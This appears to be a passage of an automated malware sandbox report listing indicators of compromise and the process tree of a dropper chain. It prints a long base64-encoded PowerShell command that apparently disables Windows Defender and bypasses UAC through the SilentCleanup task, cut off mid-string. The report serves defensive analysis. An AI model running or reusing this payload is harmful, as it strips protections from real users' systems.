Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	firefox.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
3040	1W45c9.exe
3040	1W45c9.exe
1064	skotes.exe
1064	skotes.exe
4488	2w1248.exe
4488	2w1248.exe
4304	3K30M.exe
4304	3K30M.exe
4288	4X755p.exe
4288	4X755p.exe
4288	4X755p.exe
4288	4X755p.exe
1208	H3tyh96.exe
1208	H3tyh96.exe
1208	H3tyh96.exe
1208	H3tyh96.exe
3080	d6454dce3f.exe
3080	d6454dce3f.exe
1208	H3tyh96.exe
1540	ecb59b7c34.exe
1540	ecb59b7c34.exe
2624	powershell.exe
2624	powershell.exe
3652	powershell.exe
3652	powershell.exe
1208	H3tyh96.exe
1208	H3tyh96.exe
2152	powershell.exe
2152	powershell.exe
3184	4e424400cf.exe
3184	4e424400cf.exe
3652	powershell.exe
2624	powershell.exe
2152	powershell.exe
3652	powershell.exe
2624	powershell.exe
2392	powershell.exe
2392	powershell.exe
5016	powershell.exe
5016	powershell.exe
2392	powershell.exe
5016	powershell.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
4072	66c0d22e78.exe
4072	66c0d22e78.exe
2392	powershell.exe
5016	powershell.exe
4072	66c0d22e78.exe
4072	66c0d22e78.exe
4072	66c0d22e78.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
6524	skotes.exe
6524	skotes.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4288	4X755p.exe
Token: SeDebugPrivilege	1208	H3tyh96.exe
Token: SeDebugPrivilege	112	RegSvcs.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	4500	ClientAny.exe
Token: SeDebugPrivilege	3888	taskkill.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	1056	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	3684	whoami.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	1308	taskkill.exe
Token: SeDebugPrivilege	2516	taskkill.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
3040	1W45c9.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe

Suspicious use of SendNotifyMessage 34 IoCs

pid	Process
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
3636	firefox.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe
1812	cb73b4a261.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1208	H3tyh96.exe
3636	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4072 wrote to memory of 3732	4072	92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe	82
PID 4072 wrote to memory of 3732	4072	92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe	82
PID 4072 wrote to memory of 3732	4072	92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe	82
PID 3732 wrote to memory of 1432	3732	n6e29.exe	83
PID 3732 wrote to memory of 1432	3732	n6e29.exe	83
PID 3732 wrote to memory of 1432	3732	n6e29.exe	83
PID 1432 wrote to memory of 3040	1432	T0B47.exe	84
PID 1432 wrote to memory of 3040	1432	T0B47.exe	84
PID 1432 wrote to memory of 3040	1432	T0B47.exe	84
PID 3040 wrote to memory of 1064	3040	1W45c9.exe	85
PID 3040 wrote to memory of 1064	3040	1W45c9.exe	85
PID 3040 wrote to memory of 1064	3040	1W45c9.exe	85
PID 1432 wrote to memory of 4488	1432	T0B47.exe	86
PID 1432 wrote to memory of 4488	1432	T0B47.exe	86
PID 1432 wrote to memory of 4488	1432	T0B47.exe	86
PID 3732 wrote to memory of 4304	3732	n6e29.exe	87
PID 3732 wrote to memory of 4304	3732	n6e29.exe	87
PID 3732 wrote to memory of 4304	3732	n6e29.exe	87
PID 4072 wrote to memory of 4288	4072	92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe	88
PID 4072 wrote to memory of 4288	4072	92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe	88
PID 4072 wrote to memory of 4288	4072	92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe	88
PID 1064 wrote to memory of 1988	1064	skotes.exe	89
PID 1064 wrote to memory of 1988	1064	skotes.exe	89
PID 1064 wrote to memory of 1988	1064	skotes.exe	89
PID 1064 wrote to memory of 1208	1064	skotes.exe	92
PID 1064 wrote to memory of 1208	1064	skotes.exe	92
PID 1064 wrote to memory of 1208	1064	skotes.exe	92
PID 1064 wrote to memory of 3080	1064	skotes.exe	95
PID 1064 wrote to memory of 3080	1064	skotes.exe	95
PID 1064 wrote to memory of 3080	1064	skotes.exe	95
PID 1064 wrote to memory of 1540	1064	skotes.exe	99
PID 1064 wrote to memory of 1540	1064	skotes.exe	99
PID 1064 wrote to memory of 1540	1064	skotes.exe	99
PID 1208 wrote to memory of 112	1208	H3tyh96.exe	100
PID 1208 wrote to memory of 112	1208	H3tyh96.exe	100
PID 1208 wrote to memory of 112	1208	H3tyh96.exe	100
PID 1208 wrote to memory of 112	1208	H3tyh96.exe	100
PID 1208 wrote to memory of 112	1208	H3tyh96.exe	100
PID 1208 wrote to memory of 112	1208	H3tyh96.exe	100
PID 1208 wrote to memory of 112	1208	H3tyh96.exe	100
PID 1208 wrote to memory of 112	1208	H3tyh96.exe	100
PID 1208 wrote to memory of 3652	1208	H3tyh96.exe	101
PID 1208 wrote to memory of 3652	1208	H3tyh96.exe	101
PID 1208 wrote to memory of 3652	1208	H3tyh96.exe	101
PID 1208 wrote to memory of 2624	1208	H3tyh96.exe	102
PID 1208 wrote to memory of 2624	1208	H3tyh96.exe	102
PID 1208 wrote to memory of 2624	1208	H3tyh96.exe	102
PID 1208 wrote to memory of 2456	1208	H3tyh96.exe	104
PID 1208 wrote to memory of 2456	1208	H3tyh96.exe	104
PID 1208 wrote to memory of 2456	1208	H3tyh96.exe	104
PID 2456 wrote to memory of 2152	2456	cmd.exe	110
PID 2456 wrote to memory of 2152	2456	cmd.exe	110
PID 2456 wrote to memory of 2152	2456	cmd.exe	110
PID 1064 wrote to memory of 3184	1064	skotes.exe	111
PID 1064 wrote to memory of 3184	1064	skotes.exe	111
PID 1064 wrote to memory of 3184	1064	skotes.exe	111
PID 1064 wrote to memory of 1812	1064	skotes.exe	113
PID 1064 wrote to memory of 1812	1064	skotes.exe	113
PID 1064 wrote to memory of 1812	1064	skotes.exe	113
PID 2624 wrote to memory of 3704	2624	powershell.exe	115
PID 2624 wrote to memory of 3704	2624	powershell.exe	115
PID 2624 wrote to memory of 3704	2624	powershell.exe	115
PID 3652 wrote to memory of 2392	3652	powershell.exe	133
PID 3652 wrote to memory of 2392	3652	powershell.exe	133

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	H3tyh96.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	H3tyh96.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	H3tyh96.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe
"C:\Users\Admin\AppData\Local\Temp\92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4072
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\n6e29.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\n6e29.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\T0B47.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\T0B47.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1432
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1W45c9.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1W45c9.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3040
    - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1064
      - C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1988
      - C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
        6⤵
        UAC bypass
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:1208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:112
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 112 -s 1076
        8⤵
        Program crash
        
        PID:3720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyA